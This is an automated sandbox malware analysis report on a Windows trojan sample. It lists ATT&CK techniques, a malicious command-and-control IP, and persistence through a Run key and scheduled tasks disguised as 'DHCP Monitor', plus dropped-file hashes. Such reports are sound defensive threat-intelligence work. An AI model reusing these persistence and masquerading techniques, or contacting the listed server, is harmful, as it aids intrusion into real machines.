Source: Yara match	File source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Scheduled Task/Job1	Access Token Manipulation1	Masquerading2	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Process Injection212	Disable or Modify Tools1	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Scheduled Task/Job1	Virtualization/Sandbox Evasion31	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Virtualization/Sandbox Evasion31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection212	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	System Information Discovery14	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SYT09009.exe	38%	ReversingLabs	Win32.Trojan.SpyNoon

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender	Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll	11%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.SYT09009.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366		Download File
0.0.SYT09009.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
	0%	Avira URL Cloud	safe
185.222.57.171	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
185.222.57.171	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	SYT09009.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	SYT09009.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.57.171	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	411310
Start date:	11.05.2021
Start time:	19:39:56
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SYT09009.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/16@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 26% (good quality ratio 24.6%) Quality average: 82.3% Quality standard deviation: 27.1%
HCA Information:	Successful, ratio: 79% Number of executed functions: 151 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 52.255.188.83, 23.57.81.29, 92.122.145.220, 40.88.32.150, 23.57.80.111, 20.82.210.154, 92.122.213.194, 92.122.213.247, 2.20.143.16, 2.20.142.209, 51.103.5.186, 20.54.26.129, 52.155.217.156, 20.82.209.183 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/411310/sample/SYT09009.exe

Simulations

Behavior and APIs

Time	Type	Description
19:40:57	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
19:40:58	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)
19:40:58	API Interceptor	968x Sleep call for process: MSBuild.exe modified
19:41:00	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.222.57.171	EyOVPbKPk5.exe	Get hash	malicious	Browse
	AS90800009000000.exe	Get hash	malicious	Browse
	090090000000.exe	Get hash	malicious	Browse
	fatura 893454.pdf.exe	Get hash	malicious	Browse
	0997430988.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	shipment documents.jar	Get hash	malicious	Browse	185.222.58.147
	EyOVPbKPk5.exe	Get hash	malicious	Browse	185.222.57.171
	F14 PO pdf.jar	Get hash	malicious	Browse	185.222.58.147
	AS90800009000000.exe	Get hash	malicious	Browse	185.222.57.171
	FATOUOO000.exe	Get hash	malicious	Browse	185.222.58.152
	Statement of Account April-2021.exe	Get hash	malicious	Browse	45.137.22.107
	90800000900.exe	Get hash	malicious	Browse	45.137.22.107
	fixxing.exe	Get hash	malicious	Browse	45.137.22.50
	note-mxm.exe	Get hash	malicious	Browse	45.137.22.50
	purchase order confirmation.exe	Get hash	malicious	Browse	45.137.22.50
	purchase order acknowledgement.exe	Get hash	malicious	Browse	45.137.22.50
	TBBurmah Trading Co., Ltd - products inquiry .exe	Get hash	malicious	Browse	45.137.22.50
	FRIEGHT PAYMENT 41,634.20 USD..exe	Get hash	malicious	Browse	45.137.22.107
	Due Invoices.exe	Get hash	malicious	Browse	45.137.22.107
	PURCHASE ORDER - #0022223 DATED 29042021.exe	Get hash	malicious	Browse	45.137.22.50
	PURCHASE ORDER - #0022223, date29042021.exe	Get hash	malicious	Browse	45.137.22.50
	B_N SAO SWIFT MT103.exe	Get hash	malicious	Browse	45.137.22.50
	PO0900009.exe	Get hash	malicious	Browse	185.222.58.152
	PURCHASE ORDER - #0022223 DATED 28042021.exe	Get hash	malicious	Browse	45.137.22.50
	Order ConfirmationSANQAW12NC9W03.exe	Get hash	malicious	Browse	185.222.57.152

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	RFQEMFA.Elektrik.exe	Get hash	malicious	Browse
	cotizaci#U00f3n.PDF.exe	Get hash	malicious	Browse
	MT103 Slip.exe	Get hash	malicious	Browse
	Bank details.exe	Get hash	malicious	Browse
	Shandong CIRS Form.exe	Get hash	malicious	Browse
	Placement approval.exe	Get hash	malicious	Browse
	filespdf.exe	Get hash	malicious	Browse
	goood.exe	Get hash	malicious	Browse
	Orden n.#U00ba STL21119, pdf.exe	Get hash	malicious	Browse
	Orden n.#U00ba 21115, pdf.exe	Get hash	malicious	Browse
	PO-WJO-001, pdf.exe	Get hash	malicious	Browse
	DFR2154747.vbe	Get hash	malicious	Browse
	SOA Dec2020.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Mikey.117100.12986.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Get hash	malicious	Browse
	Purchase Order PDF pdf.exe	Get hash	malicious	Browse
	Orden CW62125Q, pdf.exe	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse
	7444478441.js	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.20894581699571
Encrypted:	false
SSDEEP:	768:NElGiBcBuiyFjUwF0wdP9/rJMDnRFRJfStGpwV3e3qtAcy:ilGBu7jjP9/tMDn9Jt+VO3GO
MD5:	88BBB7610152B48C2B3879473B17857E
SHA1:	0F6CF8DD66AA58CE31DA4E8AC0631600EF055636
SHA-256:	2C7ACC16D19D076D67E9F1F37984935899B79536C9AC6EEC8850C44D20F87616
SHA-512:	5BACDF6C190A76C2C6A9A3519936E08E898AC8A2B1384D60429DF850BE778860435BF9E5EB316517D2345A5AAE201F369863F7A242134253978BCB5B2179CA58
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: RFQEMFA.Elektrik.exe, Detection: malicious, Browse Filename: cotizaci#U00f3n.PDF.exe, Detection: malicious, Browse Filename: MT103 Slip.exe, Detection: malicious, Browse Filename: Bank details.exe, Detection: malicious, Browse Filename: Shandong CIRS Form.exe, Detection: malicious, Browse Filename: Placement approval.exe, Detection: malicious, Browse Filename: filespdf.exe, Detection: malicious, Browse Filename: goood.exe, Detection: malicious, Browse Filename: Orden n.#U00ba STL21119, pdf.exe, Detection: malicious, Browse Filename: Orden n.#U00ba 21115, pdf.exe, Detection: malicious, Browse Filename: PO-WJO-001, pdf.exe, Detection: malicious, Browse Filename: DFR2154747.vbe, Detection: malicious, Browse Filename: SOA Dec2020.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Mikey.117100.12986.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe, Detection: malicious, Browse Filename: Purchase Order PDF pdf.exe, Detection: malicious, Browse Filename: Orden CW62125Q, pdf.exe, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse Filename: 7444478441.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z.....................@........... ........@.. .......................@......99....@.....................................S.......`/................... ....................................................... ............... ..H............text....... ...................... ..`.rsrc...`/.......0..................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	325
Entropy (8bit):	5.334380084018418
Encrypted:	false
SSDEEP:	6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
MD5:	65CE98936A67552310EFE2F0FF5BDF88
SHA1:	8133653A6B9A169C7496ADE315CED322CFC3613A
SHA-256:	682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
SHA-512:	2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	441
Entropy (8bit):	5.388715099859351
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U2+gYhD5itZbgbe4MqJsGMe4M6:MLF20NaL32+g2OH4xvn4j
MD5:	88F0104DB9A3F9BC4F0FC3805F571B0D
SHA1:	CDD4F34385792F0CCE0A844F4ABB447C25AB4E73
SHA-256:	F6C11D3D078ED73F2640DA510E68DEEAA5F14F79CAE2E23A254B4E37C7D0230F
SHA-512:	04B977F63CAB8DE20EA7EFA9D4299C2E625D92FA6D54CA03EECD9F322E978326B353824F23BEC0E712083BDE0DBC5CC4EE90922137106B096050CA46A166DF0E
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\5p0l53h9iyxojbq47 Download File
Process:	C:\Users\user\Desktop\SYT09009.exe
File Type:	data
Category:	dropped
Size (bytes):	13829
Entropy (8bit):	7.988330917782456
Encrypted:	false
SSDEEP:	384:1GhUkGyqVQozym1urnHgmHpgRWkHmUmUiYPsAUTmx6b1Eu:1fVNyw4HVHp8WE/sAUTmx65Eu
MD5:	8552DD44F179CF07D797311847F7C2FE
SHA1:	C6F98C25CA2FF7B2274AFDC4C15962A01A6DABAD
SHA-256:	FE33D4505AB83ED038680604357D38D0AF928054D3C9FB1A17BB639A5007367A
SHA-512:	427B6D1276F1C73138283C533C06C708A17B7D96FC0F3DD67E28B1CF2F4647FA61266C58DA5D014F28049891688318C3CE81927CB77BD19CFD8F5627AFEC77FF
Malicious:	false
Preview:	^..kx.!_.6..{.v.7I:.T.........d...0D}...j.c...W......\|L.....F..5.eV.O'T&u..4.........J..V[`b...[!(................=......................-2......$.O.+.u.}~..&.:Y#F...p_(+..A:dA.M...".,..........^A.[n.;.'.3....<ub.v...F'.[.g.\MN(.V.jI.v{..u.O.{..qjt..~}.2/<n.s,/.......q.....h...7.. pi...U........l.W......YZ9&KP.....8aZ.Zm..fB?L~....?l4....~.............P.....B%..>......;..d....?6.... "Q`...QJ.~.^]V...N.....\|D56@...1.....X.0....rL.r5.E....6...$w4..8.fyz.....R.0.hk(..z$.:.NM.b_l^..._L.ef.....a...xj..g`sp...\|..E6....t...........I..:.......X.8H14...>=.....D....\dUV.mN...R.$.......\|..g..[..e..~.......I0..(......:.....#.....T! ..b....>.JG.+A.U\`...]P.b'.R76;..}..0.....c.&..roG.y`mD8...%....zj_...'yz.....R;0.h.t.65.A.E...Q"..M..7..f..t...-......n.6y..v...m.7.c<3....}.I..r.5......p]..-T%Uf....vO.c..U.!..a`Y....N.#...>....l.......^.....=.......B#.......o9 ..D.$..6.....~S..E..X(...ij.f....:7<.M... .,....u.%....f..K.n.......%e},...9-._

C:\Users\user\AppData\Local\Temp\al46nknojj Download File
Process:	C:\Users\user\Desktop\SYT09009.exe
File Type:	data
Category:	dropped
Size (bytes):	207872
Entropy (8bit):	7.9992611810929555
Encrypted:	true
SSDEEP:	6144:WfOwF9z+53e7/1yzxQ63W9CgE4iB1fMMtD8Dq:QOMhEzWskiznkq
MD5:	C48006F5FF0B9B55937304AF196BCD29
SHA1:	4D1EA741919EACB5D19703006A93A5BB212AF905
SHA-256:	0A95E106ACB942AD49D9C4418BF3E0CCBC59CD27517BF35B7BC64AC3FE39240B
SHA-512:	C6DC55FD1F47BEAFC5E8355CF80AD5BF2FFB4810D33AA2212B9FF430787AD4D38E3A098D183616D253196692EA33D7ABCADEA47A5F85770C444669D0BC847C0D
Malicious:	false
Preview:	]..0)....b.n.e;....7......g....,.Ox.A.G.a.P.!\ye..d/.h.$..o..2.q"[..q....>.....am.....;.=..._.6......#..#z.d.E....d.p.....SRa1].."..FT.......\...9}....l..#....cx,...t_.......<`xL.....5..t.D.4Q.......T..~..KY)~p7.Gbu#.};!.p..Z+LB../...y.=.......)+..P..R.H.1X;........M.C..k.8....hr...x...)....H.bz._{..y...9.J....3-T. .L.Q.ca....B....~..'..... ..s.nc.!...Wn.7...8.......KZP..?.R..(..g.9y..jB.r0"...&pS...]..2Xr ..\|......4.N[?.o,u)..]....m.>..S.........>...<.}..P..i..k........uI.....Y...zV.....k../.G.i..G[z6........h...5H.[.-..x..:.a.N.R5J.z.....&..M......l..m..........:......p........./E4m....Q......1....UO.'.....`....\|Bh<.5.W..<.ehc.....Z...t......n0q..C.v.8...,....&......c_..Y...gh].$.0....c.nf....<...{.C.]...VL.wA..W....5Qv....P.h!m.!..9JnreY)8....0.;...1A.L.4.{.L......5.m.+q!..t[...m..k.#.'..Q...."/......."...1fkp.T....W....h.[b........+...F..@$...0.......BT.T.......U.+.C..?....g.V^..R...ydq.....X6)z....a.jR..2........M.yR...J.J..

C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll Download File
Process:	C:\Users\user\Desktop\SYT09009.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.666261408441134
Encrypted:	false
SSDEEP:	48:q/i+k4fpTvQuPihxea/we6e+pI7Wfr8o4PjhNElXb:Eke9s/96e+prr8o2hAX
MD5:	ACB4B0447D4A7F16E56D26161C75BC84
SHA1:	5B2C4AE36591FA30777EE0621433DDC653BCB77C
SHA-256:	4A872908678E042C3112E6B0C0386C0718B33A452719CFEEB4E4ACCE7172C91E
SHA-512:	3C9C04D066D6E3FBE1860097EC2243AB07955D485C1A020FEF26C0A2566F64B698CB601571DEDCFED64A1201DBCD0D05480CD0E77A3A21F06673660D5B61D59C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................PE..L......`...........!......................... ...............................@....................................... ..L....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data...&....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA63C.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	5.136963558289723
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
MD5:	AE766004C0D8792953BAFFFE8F6A2E3B
SHA1:	14B12F27543A401E2FE0AF8052E116CAB0032426
SHA-256:	1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
SHA-512:	E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	1624
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhL
MD5:	74AACAE24C76D8BE7578A460BAE23521
SHA1:	523B694F22C1E962B7234BE9637DA09060CFB0C1
SHA-256:	2EFF42A56A82D1EB8E689FE73F5471B111FA17F1ECF72B90A731B59AFF691BFB
SHA-512:	5D715F8D14841552E280A9A5A5F749B23EEEBE713F7E95B288D921982800F2AB1FAAFDA67E420F28D882BF5904799E6BE62D4CAE451507FFB5EC3631B5D11FF6
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:b8:A
MD5:	D3220FBA2B0402A56F35209195959E3D
SHA1:	73A56FD2C595162AB8E9F61DEE5E062868F78A0A
SHA-256:	0971519E13E7EA981167C65746F6FA48B21F3E5091A79121E98D3A6995FD633B
SHA-512:	B4C2F2E5EB4EA7E9441ADBC90A37BF4260A5B249E70B8FC1C0020DF739F46F19EAD7615C1756F2E1BDEA4BBFEC0EBD90696657EB3CE3628B674C895ED7B0C473
Malicious:	true
Preview:	...^...H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.221928094887364
Encrypted:	false
SSDEEP:	3:9bzY6oRDMjmPl:RzWDMCd
MD5:	AE0F5E6CE7122AF264EC533C6B15A27B
SHA1:	1265A495C42EED76CC043D50C60C23297E76CCE1
SHA-256:	73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
SHA-512:	DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
Malicious:	false
Preview:	9iH...}Z.4..f..... 8.j....\|.&X..e.F.*.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
